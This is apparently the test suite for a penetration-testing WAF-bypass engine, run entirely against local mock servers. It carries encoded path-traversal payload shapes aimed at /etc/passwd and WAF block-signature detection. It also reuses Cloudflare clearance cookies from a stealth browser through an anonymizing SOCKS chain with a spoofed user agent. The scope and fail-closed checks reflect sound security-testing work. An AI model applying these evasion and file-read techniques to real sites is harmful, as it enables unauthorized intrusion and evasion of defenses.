// wafbypass.test.mjs -- hermetic pins for the WAF-bypass mutation engine.
// A LOCAL Node http server emulates the Wordfence+PHP stack (403+signature on the
// naive shapes, marker text on the passing shapes). NO live network, ever: every run
// targets 127.0.0.1 (private -> direct per ghost doctrine) or is refused before any
// request can leave.

import test from 'node:test';
import assert from 'node:assert/strict';
import http from 'node:http';
import net from 'node:net';
import { join } from 'node:path';
import { tmpdir } from 'node:os';
import { wafBypass, cli, classify, generateMutations, DEFAULT_BLOCK_SIGS } from '../tools/wafbypass.mjs';
import { Ghost, chainEgressId } from '../engine/ghost.mjs';
import { vaultKey, writeVault } from '../tools/clearance/broker.mjs';

const PASSWD = 'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n';
const MARKER = 'root:x:0:0';
const SCOPE_LOCAL = '127.0.0.0/8';

// ---------------------------------------------------------------------------
// The Wordfence+PHP emulator.
// WAF layer (raw body inspection): 403 + signature when the body carries a naive
//   traversal sequence (../ or ..\) or the literal 'etc/passwd' path.
// PHP layer: the app urldecodes the template param ONCE (URLSearchParams) and
//   includes it -- a decoded traversal to etc/passwd serves the marker file.
// opts.flaky: serve the marker only for the first N traversal hits, then generic
//   (proves the stability re-check never claims an unstable shape).
// ---------------------------------------------------------------------------
function wordfenceEmu({ flaky = Infinity } = {}) {
  const hits = [];
  let traversalHits = 0;
  const server = http.createServer((req, res) => {
    let body = '';
    req.on('data', (d) => { body += d; });
    req.on('end', () => {
      hits.push({ method: req.method, url: req.url, body, ua: req.headers['user-agent'] || '', cookie: req.headers.cookie || '' });
      if (/\.\.[\/\\]/.test(body) || /etc\/passwd/.test(body)) {
        res.writeHead(403, { 'content-type': 'text/html', 'x-wordfence': 'blocked' });
        res.end('<html><body><h1>403 Forbidden</h1><p>A potentially unsafe operation has been detected in your submission to this site and has been blocked.</p><p>Generated by Wordfence</p></body></html>');
        return;
      }
      let template = null;
      try { template = new URLSearchParams(body).get('template'); } catch { template = null; }
      const traverses = typeof template === 'string' && /(\.\.[\/\\]).*etc\/passwd/.test(template);
      if (traverses) {
        traversalHits++;
        if (traversalHits <= flaky) {
          res.writeHead(200, { 'content-type': 'text/plain' });
          res.end(PASSWD);
          return;
        }
      }
      res.writeHead(200, { 'content-type': 'application/json' });
      res.end('{"success":true,"data":[]}');
    });
  });
  return { server, hits, getTraversalHits: () => traversalHits };
}

function listen(server) {
  return new Promise((r) => server.listen(0, '127.0.0.1', () => r(server.address().port)));
}
function close(server) {
  return new Promise((r) => server.close(r));
}

const runOpts = (extra = {}) => ({
  param: 'template', klass: 'lfi', marker: MARKER, scope: SCOPE_LOCAL,
  paceMs: 0, ghost: new Ghost(), audit: false, ...extra,
});

// ------------------------------- matrix units -------------------------------

test('matrix: lfi covers the documented families, exotic flags set, ranked', () => {
  const l = generateMutations({ klass: 'lfi' });
  assert.equal(l.length, 26);
  const ids = l.map((m) => m.id);
  for (const want of ['lfi-control-plain', 'lfi-dotdotslash', 'lfi-backslash', 'lfi-absolute', 'lfi-prefix-satisfying', 'lfi-suffix-null', 'lfi-enc-double', 'lfi-enc-overlong', 'lfi-enc-fullwidth', 'lfi-dup-first-wins', 'lfi-dup-last-wins', 'lfi-array', 'lfi-multipart', 'lfi-hdr-x-original-url', 'lfi-hdr-x-rewrite-url', 'lfi-http10']) {
    assert.ok(ids.includes(want), 'matrix includes ' + want);
  }
  const byId = Object.fromEntries(l.map((m) => [m.id, m]));
  assert.equal(byId['lfi-dotdotslash'].payload.startsWith('....//'), true);
  assert.ok(byId['lfi-enc-double'].payload.includes('%252e'), 'double-encode shape');
  assert.ok(byId['lfi-enc-overlong'].payload.includes('%c0%af'), 'overlong utf-8 slash');
  assert.ok(byId['lfi-enc-fullwidth'].payload.includes('%ef%bc%8e'), 'fullwidth dot (ASCII-source percent form)');
  assert.equal(byId['lfi-enc-fullwidth'].exotic, true);
  assert.equal(byId['lfi-control-plain'].exotic, false);
  for (let i = 1; i < l.length; i++) assert.ok(l[i].rank > l[i - 1].rank, 'strictly ranked');
  // custom base payload is honored
  const custom = generateMutations({ klass: 'lfi', base: '../../boot.ini' });
  assert.ok(custom.find((m) => m.id === 'lfi-control-plain').payload.startsWith('../../boot.ini'));
});

test('matrix: sqli + xss classes are real (general-purpose, not lfi-only)', () => {
  assert.equal(generateMutations({ klass: 'sqli' }).length, 8);
  assert.equal(generateMutations({ klass: 'xss' }).length, 6);
  assert.deepEqual(generateMutations({ klass: 'csrf' }), [], 'unknown class -> empty, never throws');
});

// ------------------------------- oracle units -------------------------------

test('oracle: PASS requires the marker; BLOCKED on status/signature; else OTHER', () => {
  const re = new RegExp(MARKER, 'i');
  assert.equal(classify({ status: 200, headers: {}, body: PASSWD }, { markerRe: re }).verdict, 'PASS');
  assert.equal(classify({ status: 403, headers: {}, body: 'nope' }, { markerRe: re }).verdict, 'BLOCKED');
  assert.equal(classify({ status: 406, headers: {}, body: 'nope' }, { markerRe: re }).verdict, 'BLOCKED');
  assert.equal(classify({ status: 200, headers: {}, body: 'Generated by Wordfence' }, { markerRe: re }).verdict, 'BLOCKED');
  assert.equal(classify({ status: 200, headers: { 'cf-mitigated': 'challenge' }, body: '' }, { markerRe: re }).verdict, 'BLOCKED');
  assert.equal(classify({ status: 200, headers: {}, body: '{"success":true}' }, { markerRe: re }).verdict, 'OTHER');
  // conservative: a 403 carrying the marker text is NOT a pass (status guard)
  assert.equal(classify({ status: 403, headers: {}, body: PASSWD }, { markerRe: re }).verdict, 'BLOCKED');
  // custom block sigs override the defaults
  assert.equal(classify({ status: 200, headers: {}, body: 'custom-waf-block' }, { markerRe: re, blockSigs: ['custom-waf-block'] }).verdict, 'BLOCKED');
  assert.equal(classify({ status: 0, error: 'boom' }, { markerRe: re }).verdict, 'OTHER', 'transport failure is data, classified OTHER');
});

// ------------------------------- integration --------------------------------

test('discovery: engine finds the passing shape from the matrix (--first), control blocked, stability 3/3', async (t) => {
  const emu = wordfenceEmu();
  const port = await listen(emu.server);
  t.after(() => close(emu.server));
  const url = 'http://127.0.0.1:' + port + '/wp-admin/admin-ajax.php';
  const rep = await wafBypass(url, runOpts({ first: true }));
  assert.equal(rep.ok, true);
  assert.equal(rep.controlBlocked, true, 'the naive ../ control got signed (WAF emulation works)');
  assert.equal(rep.passingShapes.length, 1);
  const shape = rep.passingShapes[0];
  assert.equal(shape.mutation.id, 'lfi-enc-full', 'first passing shape in rank order');
  assert.equal(shape.stability, '3/3 re-verified');
  assert.ok(shape.evidenceSnippet.includes(MARKER), 'marker evidence snippet recorded');
  assert.equal(rep.blockedCount, 9, 'control + 8 raw-literal shapes all signed');
  assert.equal(rep.tried, 13, '10 primaries + 3 stability re-checks');
  // the passing mutation was sent exactly 1 + 3 times (initial + stability)
  const encFullHits = emu.hits.filter((h) => h.body.includes('%2e%2e%2f%65%74%63'));
  assert.equal(encFullHits.length, 4, 'stability re-check actually re-sent the shape 3x');
  assert.ok(rep.gaps.some((g) => g.includes('http10')), 'http10 transport gap reported honestly');
  assert.match(rep.note, /never a general WAF-bypass claim/);
});

test('exhaustive: every marker-verifiable shape is found, OTHER deltas recorded', async (t) => {
  const emu = wordfenceEmu();
  const port = await listen(emu.server);
  t.after(() => close(emu.server));
  const rep = await wafBypass('http://127.0.0.1:' + port + '/wp-admin/admin-ajax.php', runOpts());
  assert.equal(rep.ok, true);
  assert.deepEqual(rep.passingShapes.map((s) => s.mutation.id), ['lfi-enc-full', 'lfi-enc-dots', 'lfi-enc-mixedcase']);
  assert.ok(rep.tried <= rep.budget, 'budget respected');
  assert.ok(rep.others.length > 0, 'OTHER responses recorded with status/size deltas');
  assert.ok(rep.others.some((o) => o.id === 'lfi-enc-double'), 'double-encoded shape decoded-once = no traversal = OTHER');
  assert.ok(rep.gaps.some((g) => g.includes('ORIGIN-DIRECT')), 'edge-vs-origin honesty gap present');
});

test('honesty contract: no marker evidence -> zero bypass claims', async (t) => {
  const emu = wordfenceEmu();
  const port = await listen(emu.server);
  t.after(() => close(emu.server));
  const rep = await wafBypass('http://127.0.0.1:' + port + '/wp-admin/admin-ajax.php', runOpts({ marker: 'THIS_MARKER_NEVER_MATCHES_ZZ9' }));
  assert.equal(rep.ok, true, 'run itself completed');
  assert.equal(rep.passingShapes.length, 0, 'no marker, no bypass claim -- ever');
  assert.equal(rep.unstable.length, 0);
  assert.ok(rep.gaps.some((g) => g.includes('absence of evidence')), 'honest gap phrasing');
});

test('stability gate: a shape that passes once then flakes is recorded unstable, NEVER claimed', async (t) => {
  const emu = wordfenceEmu({ flaky: 1 }); // marker served exactly once
  const port = await listen(emu.server);
  t.after(() => close(emu.server));
  const rep = await wafBypass('http://127.0.0.1:' + port + '/wp-admin/admin-ajax.php', runOpts({ first: true }));
  assert.equal(rep.ok, true);
  assert.equal(rep.passingShapes.length, 0, 'flaky pass is not a bypass');
  assert.equal(rep.unstable.length, 1);
  assert.match(rep.unstable[0].stability, /0\/3/);
  assert.match(rep.unstable[0].verdict, /NOT claimed/);
  assert.ok(rep.gaps.some((g) => g.includes('FAILED stability re-verification')));
});

test('budget cap: hard request ceiling honored, untried shapes reported as gaps', async (t) => {
  const emu = wordfenceEmu();
  const port = await listen(emu.server);
  t.after(() => close(emu.server));
  const rep = await wafBypass('http://127.0.0.1:' + port + '/wp-admin/admin-ajax.php', runOpts({ budget: 5 }));
  assert.equal(rep.ok, true);
  assert.equal(rep.tried, 5, 'exactly the budget, never more');
  assert.equal(emu.hits.length, 5, 'server saw exactly 5 requests');
  assert.equal(rep.passingShapes.length, 0, 'passing shape is beyond the budget horizon');
  assert.ok(rep.gaps.some((g) => g.includes('untried') && g.includes('unobserved, not absent')));
});

// ------------------------------- governance ---------------------------------

test('scope: out-of-scope target refused with the signed CIDRs printed, zero requests sent', async (t) => {
  const emu = wordfenceEmu();
  const port = await listen(emu.server);
  t.after(() => close(emu.server));
  const rep = await wafBypass('http://127.0.0.1:' + port + '/wp-admin/admin-ajax.php', runOpts({ scope: '10.10.0.0/16,192.168.50.0/24' }));
  assert.equal(rep.ok, false);
  assert.match(rep.reason, /outside the signed engagement scope/);
  assert.match(rep.reason, /10\.10\.0\.0\/16,192\.168\.50\.0\/24/, 'signed scope printed in the refusal');
  assert.equal(emu.hits.length, 0, 'not a single packet sent');
});

test('scope: missing scope is a fail-closed refusal', async (t) => {
  const emu = wordfenceEmu();
  const port = await listen(emu.server);
  t.after(() => close(emu.server));
  const rep = await wafBypass('http://127.0.0.1:' + port + '/wp-admin/admin-ajax.php', runOpts({ scope: undefined }));
  assert.equal(rep.ok, false);
  assert.match(rep.reason, /no signed engagement scope/);
  assert.equal(emu.hits.length, 0);
});

test('ghost: public target with no chain is refused fail-closed (no network attempted)', async () => {
  // IP-literal public URL: scope check needs no DNS; the ghost gate must refuse next.
  const rep = await wafBypass('https://93.184.216.34/', runOpts({ scope: '0.0.0.0/0', ghost: new Ghost() }));
  assert.equal(rep.ok, false);
  assert.match(rep.reason, /ghost chain unavailable/);
  assert.match(rep.reason, /fail-closed/);
});

// ------------------------------- usage refusals -----------------------------

test('usage errors are refusals (ok:false), never throws', async () => {
  for (const [url, opts, want] of [
    ['ftp://x/', runOpts(), /http\(s\) URL/],
    ['http://127.0.0.1/', runOpts({ param: '' }), /--param/],
    ['http://127.0.0.1/', runOpts({ marker: undefined }), /--marker/],
    ['http://127.0.0.1/', runOpts({ marker: '([' }), /not a valid regex/],
    ['http://127.0.0.1/', runOpts({ klass: 'ssrf' }), /--class/],
  ]) {
    const rep = await wafBypass(url, opts);
    assert.equal(rep.ok, false, want.source);
    assert.match(rep.reason, want);
  }
});

// ------------------------------- audit + cli --------------------------------

test('audit: exactly one line per run, and cli() wires the flags', async (t) => {
  const emu = wordfenceEmu();
  const port = await listen(emu.server);
  t.after(() => close(emu.server));
  const auditLines = [];
  const url = 'http://127.0.0.1:' + port + '/wp-admin/admin-ajax.php';
  const rep = await cli(
    ['--url', url, '--param', 'template', '--class', 'lfi', '--marker', MARKER, '--scope', SCOPE_LOCAL, '--pace', '0', '--first'],
    { ghost: new Ghost(), audit: (e) => auditLines.push(e) },
  );
  assert.equal(rep.ok, true);
  assert.equal(rep.passingShapes.length, 1);
  assert.equal(auditLines.length, 1, 'one audit line per run');
  assert.equal(auditLines[0].tool, 'wafbypass');
  assert.equal(auditLines[0].url, url);
  assert.equal(auditLines[0].passing, 1);
  assert.equal(auditLines[0].blocked, 9);
  assert.ok(auditLines[0].ts);
});

test('cli: unreadable --body-template file is an honest refusal', async () => {
  const rep = await cli(['--url', 'http://127.0.0.1:1/', '--param', 'template', '--class', 'lfi', '--marker', MARKER, '--scope', SCOPE_LOCAL, '--body-template', 'no/such/file.txt'], { audit: false });
  assert.equal(rep.ok, false);
  assert.match(rep.reason, /body-template/);
});

// ---------------------------------------------------------------------------
// The vault ride (2026-08-10: a cookieless matrix against a Cloudflare-challenged
// zone burned 24/24 at the edge with a valid clearance sitting in the vault).
// Wire-level proof over the cfride.test.mjs harness: a LOCAL mock SOCKS5 proxy +
// LOCAL origin; the public target NAME never resolves locally, so a served matrix
// run PROVES the requests rode the chain (DNS-by-last-proxy). Nothing leaves
// loopback, ever.
// ---------------------------------------------------------------------------

const FAKE_UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36';
const PUBLIC_HOST = 'zone-one.example'; // unresolvable locally: direct egress would fail DNS
const PERSONA_RE = /Chrome\/126/; // the ghost persona UA (engine/ghost scrubHeaders default)

// server.close() waits for keep-alive agent sockets forever -- force them down first.
function closeServer(server) {
  return new Promise((r) => {
    const t = setTimeout(r, 2000);
    try { server.closeAllConnections && server.closeAllConnections(); } catch {}
    server.close(() => { clearTimeout(t); r(); });
  });
}

// SOCKS5 mock (the ghost.test.mjs pattern): completes the handshake, records the
// CONNECT target, then tunnels by CONNECT PORT to 127.0.0.1 -- the public NAME
// travels to the proxy (remote-DNS doctrine) and the loopback origin answers.
function mockSocks5(state) {
  return net.createServer((sock) => {
    let stage = 0, buf = Buffer.alloc(0);
    sock.on('data', (d) => {
      buf = Buffer.concat([buf, d]);
      if (stage === 0 && buf.length >= 2 + buf[1]) {
        sock.write(Buffer.from([0x05, 0x00])); stage = 1; buf = Buffer.alloc(0);
      } else if (stage === 1 && buf.length >= 5) {
        const hlen = buf[4];
        const host = buf.subarray(5, 5 + hlen).toString();
        const port = buf.readUInt16BE(5 + hlen);
        state.connects.push({ host, port });
        const up = net.connect({ host: '127.0.0.1', port }, () => {
          sock.write(Buffer.from([0x05, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0]));
          sock.pipe(up); up.pipe(sock);
        });
        up.on('error', () => sock.destroy());
        stage = 2;
      }
    });
  });
}

function tmpVault() {
  return join(tmpdir(), 'wafbypass-vault-' + process.pid + '-' + Math.random().toString(36).slice(2) + '.json');
}

// A vault holding ONE entry for zone under egressId (the mint-side keying).
// expired: true backdates the TTL so readVault prunes it on read.
function vaultWith(zone, egressId, cookieValue, { expired = false } = {}) {
  const vaultPath = tmpVault();
  const now = Date.now();
  const mintedAt = new Date(now - 60000).toISOString();
  const expiresAt = new Date(now + (expired ? -1000 : 45 * 60000)).toISOString();
  const entries = {};
  entries[vaultKey(zone, egressId, FAKE_UA)] = {
    cookies: [{ name: 'cf_clearance', value: cookieValue, domain: zone.split(':')[0], path: '/' }],
    ua: FAKE_UA, mintedAt, expiresAt,
    engine: 'patchright (stealth Playwright + real Chrome)',
  };
  assert.equal(writeVault(entries, { vaultPath }).ok, true);
  return { vaultPath, mintedAt, expiresAt };
}

test('vault ride: chain-keyed entry -- every matrix request rides the chain with the vault cookie + exact UA', async (t) => {
  const socksState = { connects: [] };
  const socks = mockSocks5(socksState);
  const emu = wordfenceEmu();
  const pport = await listen(socks);
  const oport = await listen(emu.server);
  t.after(async () => { await closeServer(emu.server); await closeServer(socks); });

  const chain = 'socks5://127.0.0.1:' + pport;
  const egressId = chainEgressId(chain);
  const ghost = new Ghost();
  ghost.configure({ mode: 'on', chain });
  const url = 'http://' + PUBLIC_HOST + ':' + oport + '/wp-admin/admin-ajax.php';
  const v = vaultWith(PUBLIC_HOST + ':' + oport, egressId, 'chain-minted');

  const rep = await wafBypass(url, runOpts({
    first: true, ghost, vaultPath: v.vaultPath,
    scope: '93.184.216.0/24', resolve: async () => ['93.184.216.34'],
  }));
  assert.equal(rep.ok, true, rep.reason);
  assert.equal(rep.passingShapes.length, 1, 'the matrix still works through the ride');
  assert.equal(rep.ride.egressId, egressId);
  assert.match(rep.ride.transport, /ghost chain \(1 hop/);
  assert.equal(rep.ride.mintedAt, v.mintedAt);
  assert.equal(rep.ride.expiresAt, v.expiresAt);
  assert.equal(rep.transport, rep.ride.transport, 'the top-level transport names the ride');
  // egress parity: every request went to the proxy carrying the PUBLIC NAME (remote
  // DNS -- a direct dial would have failed DNS on zone-one.example)
  assert.ok(socksState.connects.length >= 1, 'the proxy was dialed');
  for (const cn of socksState.connects) assert.deepEqual(cn, { host: PUBLIC_HOST, port: oport });
  // and the origin saw the vault's EXACT identity on EVERY matrix request
  assert.equal(emu.hits.length, rep.tried);
  for (const h of emu.hits) {
    assert.equal(h.ua, FAKE_UA, 'the vault UA survives the scrub verbatim');
    assert.equal(h.cookie, 'cf_clearance=chain-minted', 'the vault cookie rides every request');
  }
  // OPSEC: the live credential never appears in the report
  assert.ok(!JSON.stringify(rep).includes('chain-minted'), 'the cookie value is never reported');
});

test('vault ride: --no-ride forces cookieless even with a valid entry on file', async (t) => {
  const socksState = { connects: [] };
  const socks = mockSocks5(socksState);
  const emu = wordfenceEmu();
  const pport = await listen(socks);
  const oport = await listen(emu.server);
  t.after(async () => { await closeServer(emu.server); await closeServer(socks); });

  const chain = 'socks5://127.0.0.1:' + pport;
  const ghost = new Ghost();
  ghost.configure({ mode: 'on', chain });
  const url = 'http://' + PUBLIC_HOST + ':' + oport + '/wp-admin/admin-ajax.php';
  const v = vaultWith(PUBLIC_HOST + ':' + oport, chainEgressId(chain), 'chain-minted');

  const rep = await wafBypass(url, runOpts({
    first: true, ghost, vaultPath: v.vaultPath, ride: false,
    scope: '93.184.216.0/24', resolve: async () => ['93.184.216.34'],
  }));
  assert.equal(rep.ok, true, rep.reason);
  assert.equal(rep.ride, null, 'no ride is claimed');
  assert.ok(!rep.gaps.some((g) => /no valid clearance/.test(g)), 'an explicit --no-ride is not a gap');
  assert.ok(emu.hits.length > 0);
  for (const h of emu.hits) {
    assert.equal(h.cookie, '', 'no cookie on the wire');
    assert.match(h.ua, PERSONA_RE, 'the plain ghost persona UA, not the vault UA');
    assert.notEqual(h.ua, FAKE_UA);
  }
});

test('vault ride: expired or absent entry -- cookieless with the honest gap, never a silent assumption', async (t) => {
  const emu = wordfenceEmu();
  const oport = await listen(emu.server);
  t.after(() => closeServer(emu.server));
  const url = 'http://127.0.0.1:' + oport + '/wp-admin/admin-ajax.php';
  const zone = '127.0.0.1:' + oport;

  // expired: readVault prunes it on read, so the run is exactly the absent case
  const expired = vaultWith(zone, 'direct', 'stale-cookie', { expired: true });
  const r1 = await wafBypass(url, runOpts({ first: true, vaultPath: expired.vaultPath }));
  assert.equal(r1.ok, true, r1.reason);
  assert.equal(r1.ride, null);
  assert.ok(r1.gaps.some((g) => /no valid clearance for zone/.test(g) && /mint first/.test(g)), 'the honest gap, got: ' + JSON.stringify(r1.gaps));

  // absent: no vault file at all
  const before = emu.hits.length;
  const r2 = await wafBypass(url, runOpts({ first: true, vaultPath: tmpVault() }));
  assert.equal(r2.ok, true, r2.reason);
  assert.equal(r2.ride, null);
  assert.ok(r2.gaps.some((g) => /no valid clearance for zone/.test(g) && /mint first/.test(g)));

  for (const h of emu.hits) {
    assert.equal(h.cookie, '', 'cookieless without a valid entry');
    assert.match(h.ua, PERSONA_RE);
  }
  assert.ok(emu.hits.length > before, 'the absent-vault run still sent its matrix');
});

test('vault ride egress parity: direct-keyed entry rides DIRECT per doctrine -- never the chain', async (t) => {
  const socksState = { connects: [] };
  const socks = mockSocks5(socksState);
  const emu = wordfenceEmu();
  const pport = await listen(socks);
  const oport = await listen(emu.server);
  t.after(async () => { await closeServer(emu.server); await closeServer(socks); });

  const ghost = new Ghost();
  ghost.configure({ mode: 'on', chain: 'socks5://127.0.0.1:' + pport });
  const url = 'http://127.0.0.1:' + oport + '/wp-admin/admin-ajax.php';
  const v = vaultWith('127.0.0.1:' + oport, 'direct', 'direct-minted');

  const rep = await wafBypass(url, runOpts({ first: true, ghost, vaultPath: v.vaultPath, egressId: 'direct' }));
  assert.equal(rep.ok, true, rep.reason);
  assert.equal(rep.ride.egressId, 'direct');
  assert.match(rep.ride.transport, /^direct/);
  assert.equal(socksState.connects.length, 0, 'the chain was NEVER dialed for a direct-bound ride');
  assert.ok(emu.hits.length > 0);
  for (const h of emu.hits) {
    assert.equal(h.ua, FAKE_UA);
    assert.equal(h.cookie, 'cf_clearance=direct-minted');
  }

  // parity corollary: with ghost armed the DEFAULT lookup id is the chain's canonical
  // id (what the mint side vaults under) -- a direct-keyed entry is honestly MISSED,
  // not silently ridden over the wrong egress
  const miss = await wafBypass(url, runOpts({ first: true, ghost, vaultPath: v.vaultPath }));
  assert.equal(miss.ride, null);
  assert.ok(miss.gaps.some((g) => /no valid clearance for zone/.test(g)));
  for (const h of emu.hits.slice(rep.tried)) assert.equal(h.cookie, '', 'the mismatched entry never rides');

  // public variant (spy requester -- no wire): a direct-bound entry under ghost 'on'
  // resolves DIRECT best-effort transport, exactly the cfride doctrine
  const pub = vaultWith('93.184.216.34', 'direct', 'op-direct');
  const seen = [];
  const r2 = await wafBypass('http://93.184.216.34/ajax', runOpts({
    first: true, scope: '0.0.0.0/0', ghost, vaultPath: pub.vaultPath, egressId: 'direct',
    requester: async (req) => { seen.push(req); return { status: 200, headers: {}, body: PASSWD }; },
  }));
  assert.equal(r2.ok, true, r2.reason);
  assert.match(r2.ride.transport, /best-effort/);
  assert.ok(seen.length > 0);
});

test('vault ride fail-closed: entry bound to chain A with ghost armed with chain B refuses BEFORE any request', async () => {
  const ghost = new Ghost();
  ghost.configure({ mode: 'on', chain: 'socks5://127.0.0.1:1' }); // chain B (never dialed: the refusal comes first)
  const v = vaultWith('93.184.216.34', 'socks5://10.64.0.1:1080', 'chain-a-minted'); // bound to chain A
  let wire = 0;
  const rep = await wafBypass('http://93.184.216.34/ajax', runOpts({
    scope: '0.0.0.0/0', ghost, vaultPath: v.vaultPath, egressId: 'socks5://10.64.0.1:1080',
    requester: async () => { wire++; return { status: 200, headers: {}, body: PASSWD }; },
  }));
  assert.equal(rep.ok, false);
  assert.match(rep.reason, /different exit IP/);
  assert.match(rep.reason, /fail-closed/);
  assert.match(rep.reason, /--no-ride/, 'the refusal names the cookieless escape hatch');
  assert.equal(wire, 0, 'not a single request attempted');
});
